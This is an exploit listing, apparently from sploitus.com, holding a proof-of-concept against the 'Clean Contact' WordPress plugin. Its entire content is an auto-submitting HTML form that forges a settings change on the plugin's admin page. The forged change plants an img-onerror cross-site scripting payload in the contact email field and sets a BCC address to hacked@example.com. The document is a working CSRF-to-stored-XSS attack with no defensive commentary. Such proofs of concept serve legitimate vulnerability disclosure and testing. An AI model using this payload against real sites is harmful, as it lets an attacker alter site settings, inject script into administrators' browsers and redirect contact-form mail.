Share
## https://sploitus.com/exploit?id=WPEX-ID:8C8DAD47-8591-47DC-B84F-8C5CB18B2D78
<form id="test" action="https://example.com/wp-admin/plugins.php?page=clean_contact" method="POST">
<input type="text" name="clean_contact_settings" value="1">
<input type="text" name="clean_contact_email" value='hacked@example.com"><img src onerror=alert(/XSS/)>'>
<input type="text" name="clean_contact_cc" value="">
<input type="text" name="clean_contact_bcc" value="hacked@example.com">
<input type="text" name="clean_contact_prefix" value="clean-contact">
<input type="text" name="clean_contact_thanks" value="Thank you. Message sent!">
<input type="text" name="clean_contact_thanks_url" value="https://example.com">
<input type="text" name="clean_contact_from_email" value="">
<input type="text" name="Submit" value="Save Settings">
</form>
<script>
document.getElementById("test").submit();
</script>